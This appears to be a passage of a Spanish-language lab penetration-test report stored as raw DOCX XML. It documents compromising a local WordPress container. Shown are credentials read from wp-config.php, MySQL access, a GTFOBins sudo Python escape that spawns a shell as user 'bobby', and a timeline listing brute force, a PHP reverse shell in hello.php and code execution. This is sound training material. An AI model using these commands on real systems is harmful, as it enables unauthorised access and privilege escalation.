                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 18. Privilegio sudo NOPASSWD que permite a www-data ejecutar Python3 como el usuario bobby.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El resultado reveló una regla crítica: www-data puede ejecutar /usr/bin/python3 como el usuario bobby, sin necesidad de contraseña. Este patrón corresponde a una técnica de escape documentada en GTFOBins para el binario de Python, que permite invocar una shell interactiva con los privilegios del usuario objetivo:</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476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i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 19. Técnica de GTFOBins para Python — generación de shell mediante sudo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 Credenciales de base de datos en wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mientras se verificaba la disponibilidad del binario necesario para la técnica anterior, se revisó también el archivo de configuración de WordPress en busca de credenciales reutilizables (línea de trabajo consistente con la pertenencia de www-data al grupo mysql observada previamente):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www-data@95f7ade90a0b:/home$ head -n 40 /var/www/html/wp-config.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El archivo expuso en texto plano las credenciales de la base de datos de WordPress, junto con la ruta del socket local de MySQL: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define( 'DB_NAME', 'wordpress' );</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">define( 'DB_USER', 'wpuser' );</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">define( 'DB_PASSWORD', 'wppass' );</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">define( 'DB_HOST', 'localhost:/var/run/mysqld/mysqld.sock' );</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Con estas credenciales se accedió localmente al motor de base de datos y se confirmó la existencia de la base “wordpress”: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www-data@95f7ade90a0b:/home$ mysql -u wpuser -p</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Enter password: wppass</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mysql&gt; show databases;</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Database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information_schema |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">| performance_schema |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">| wordpress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mysql&gt; use wordpress;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Database changed</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5431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543175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 20. wp-config.php revelando credenciales de base de datos y acceso con mysql -u wpuser -p.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:left w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:right w:val="single" w:color="D1D5DB" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4000500" cy="21526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152650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 21. Bases de datos disponibles en la instancia MySQL local.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Este acceso confirmó credenciales válidas y reutilizables para el servicio de base de datos, aunque la ruta efectiva de escalada hacia bobby siguió siendo el privilegio sudo sobre Python3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 Explotación del privilegio sudo (GTFOBins)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un primer intento de ejecutar la técnica de GTFOBins no tuvo éxito porque, pese a estar autorizado por sudo, el binario /usr/bin/python3 no se encontraba disponible en el contenedor en ese momento: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www-data@95f7ade90a0b:/home$ sudo -u bobby /usr/bin/python3 -c 'import os; os.execl("/bin/bash", "bash")'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo: /usr/bin/python3: command not found</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">www-data@95f7ade90a0b:/home$ ls -al /usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ls: cannot access '/usr/bin/python3': No such file or directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Al tratarse del propio contenedor de laboratorio desplegado localmente, se restableció la disponibilidad del intérprete desde el host, con acceso root sobre el contenedor vía Docker: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sudo docker ps</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CONTAINER ID   IMAGE    COMMAND                STATUS         PORTS              NAMES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">95f7ade90a0b   talent   "/entrypoint.sh apac…" Up 52 minutes  80/tcp, 3306/tcp   talent_container</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sudo docker exec -it -u root talent_container bash -c "apt update &amp;&amp; apt install python3 -y"</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22193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219325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 22. Restablecimiento del intérprete Python3 en el contenedor talent_container desde el host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Con el binario ya disponible (enlazado a python3.8), se repitió la técnica de GTFOBins, logrando esta vez una shell interactiva como el usuario bobby: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2E"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www-data@95f7ade90a0b:/home$ ls -al /usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -&gt; python3.8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">www-data@95f7ade90a0b:/home$ sudo -u bobby /usr/bin/python3 -c 'import os; os.execl("/bin/bash", "bash")'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bobby@95f7ade90a0b:/home$ whoami</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bobby</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bobby@95f7ade90a0b:/home$ id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E5E7EB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">uid=1000(bobby) gid=1000(bobby) groups=1000(bobby)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:left w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:right w:val="single" w:color="D1D5DB" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="12192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219200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 23. Escalada de privilegios completada — shell interactiva como el usuario bobby.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Con esto se completó la escalada de privilegios desde el usuario del servicio web (www-data) hasta el usuario local bobby, mediante abuso de una regla sudo mal configurada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Línea de tiempo del compromiso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shd w:fill="0F766E" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Fase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="0F766E" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Acción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="0F766E" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconocimiento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Escaneo de puertos con Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Puerto 80/tcp abierto (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumeración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">WPScan — enumeración de usuarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Usuario “admin” identificado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumeración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">WPScan — modo agresivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Tema con listado de directorios habilitado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Explotación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Fuerza bruta XML-RPC con rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenciales admin:admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Explotación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Edición de hello.php vía panel admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reverse shell PHP insertada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Explotación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Activación del plugin Hello Dolly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Ejecución remota de código</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
